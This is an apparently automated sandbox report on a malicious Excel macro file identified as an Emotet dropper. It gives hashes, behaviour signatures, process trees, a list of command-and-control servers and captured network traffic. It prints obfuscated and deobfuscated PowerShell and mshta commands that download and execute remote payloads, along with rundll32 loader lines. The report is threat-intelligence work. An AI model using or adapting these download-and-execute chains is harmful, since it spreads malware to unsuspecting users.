Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
152s -
max time network
148s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19/01/2022, 23:54 UTC
General
-
Target
b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm
-
Size
115KB
-
MD5
ae463a7f0de640061802d78223d7424d
-
SHA1
d4809b8d5b09ede52d07f27485ed5d54bb7e4eca
-
SHA256
b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3
-
SHA512
ea7ab3c0d5641711e0600dac4c1bf6bcd9035715b529360d7027a1e64ae963b958b8b70d890dc027487cf138b3eb92862cb69a9875f34216e64a8a1facee2758
Score
10/10
Malware Config
Extracted
Language
hta
Source
1
mshta http://0x5cff39c3/sec/se1.html
URLs
hta.dropper
http://0x5cff39c3/sec/se1.html
Extracted
Language
ps1
Deobfuscated
1
# powershell snippet 0
2
$c1 = "(New-Object Net.We"
3
$c4 = "bClient).Downlo"
4
$c3 = "adString('http://92.255.57.195/sec/se1.png')"
5
$ji = "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"
6
invoke-expression "(New-Object Net.WebClient).DownloadString('http://92.255.57.195/sec/se1.png')"|invoke-expression
7
8
# powershell snippet 1
9
(new-object net.webclient).downloadstring("http://92.255.57.195/sec/se1.png")
10
URLs
ps1.dropper
http://92.255.57.195/sec/se1.png
Extracted
Family
emotet
Botnet
Epoch5
C2
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
eck1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE2DWT12OLUMXfzeFp+bE2AJubVDsW
3
NqJdRC6yODDYRzYuuNL0i2rI2Ex6RUQaBvqPOL7a+wCWnIQszh42gCRQlg==
4
-----END PUBLIC KEY-----
ecs1.plain
1
-----BEGIN PUBLIC KEY-----
2
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE9C8agzYaJ1GMJPLKqOyFrlJZUXVI
3
lAZwAnOq6JrEKHtWCQ+8CHuAIXqmKH6WRbnDw1wmdM/YvqKFH36nqC2VNA==
4
-----END PUBLIC KEY-----
Signatures
-
Emotet
Emotet is a trojan that is primarily spread through spam emails.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 20 IoCs
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b9510c284bf2350a71ff66a248c97768d98b4e04146ade4a28fd9f1fab9137c3.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/se1.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xokaozvpqz\pvsqulbvuplvj.fnj",AIrvNFjwTIczp8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xokaozvpqz\pvsqulbvuplvj.fnj",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3664 -s 16364⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
-
GEThttp://92.255.57.195/sec/se1.htmlRemote address:92.255.57.195:80RequestGET /sec/se1.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 92.255.57.195
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 23:54:52 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:29:09 GMT
ETag: "2adf-5d5f38fbf4740"
Accept-Ranges: bytes
Content-Length: 10975
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
-
GEThttp://92.255.57.195/sec/se1.pngRemote address:92.255.57.195:80RequestGET /sec/se1.png HTTP/1.1
Host: 92.255.57.195
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 23:54:54 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Wed, 19 Jan 2022 18:27:22 GMT
ETag: "430-5d5f3895e9680"
Accept-Ranges: bytes
Content-Length: 1072
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
-
DNSseven-lines.comRemote address:8.8.8.8:53Requestseven-lines.comIN AResponseseven-lines.comIN A178.208.83.22 -
GEThttp://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/Remote address:178.208.83.22:80RequestGET /wp-includes/QEGNF4XUSR2Ps/ HTTP/1.1
Host: seven-lines.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Jan 2022 23:54:55 GMT
Content-Type: application/x-msdownload
Content-Length: 616448
Connection: keep-alive
Keep-Alive: timeout=5
X-Powered-By: PHP/5.6.37
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Wed, 19 Jan 2022 23:54:55 GMT
Content-Disposition: attachment; filename="YdL2KCVPV8.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 61e8a4cf14e00=1642636495; expires=Wed, 19-Jan-2022 23:55:55 GMT; Max-Age=60; path=/
Last-Modified: Wed, 19 Jan 2022 23:54:55 GMT
-
GEThttps://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZdRemote address:69.16.218.101:8080RequestGET /PtdzEgctxefTHbqGmgxSrBjIUuvZd HTTP/1.1
Cookie: cvPrOubDezBxMbD=FRqjaRBofmcFnxoj3abmLU5mJCGtPw5BCK2kLof4OKPkkASzOXIKB+UsN7MA1eyLETIutVYBCTPKm5i5RzGRkLhXHPyPF8pftEkS8mUvhCpfqLK7htjcdYUpr0aG2ODGBhJKL/TJ1eS+XhdYypOiuzXVsneB5YbfMxK8FWeyegCYly/dvcZx+g+yllzZaemmXArjIuWddfaoKpE2rTG/1qsAdr60N5KNgl+N9LInYTrtrJB2beE+qaXNqS+15mo0g14iB35/NwMxrETBgynDSsMljmNr6B32YiSDikoE
Host: 69.16.218.101:8080
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Jan 2022 23:55:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
52.109.88.36:443
-
52.109.88.36:443nexusrules.officeapps.live.comtls
-
92.255.57.195:80http://92.255.57.195/sec/se1.htmlhttp
HTTP Request
GET http://92.255.57.195/sec/se1.htmlHTTP Response
200 -
92.255.57.195:80http://92.255.57.195/sec/se1.pnghttp
HTTP Request
GET http://92.255.57.195/sec/se1.pngHTTP Response
200 -
178.208.83.22:80http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/http
HTTP Request
GET http://seven-lines.com/wp-includes/QEGNF4XUSR2Ps/HTTP Response
200 -
45.138.98.34:80 -
69.16.218.101:8080https://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZdtls, http
HTTP Request
GET https://69.16.218.101:8080/PtdzEgctxefTHbqGmgxSrBjIUuvZdHTTP Response
200
-
8.8.8.8:53seven-lines.comdns
DNS Request
seven-lines.com
DNS Response
178.208.83.22
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
160KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
240KB
-
Filesize
472KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB
-
Filesize
160KB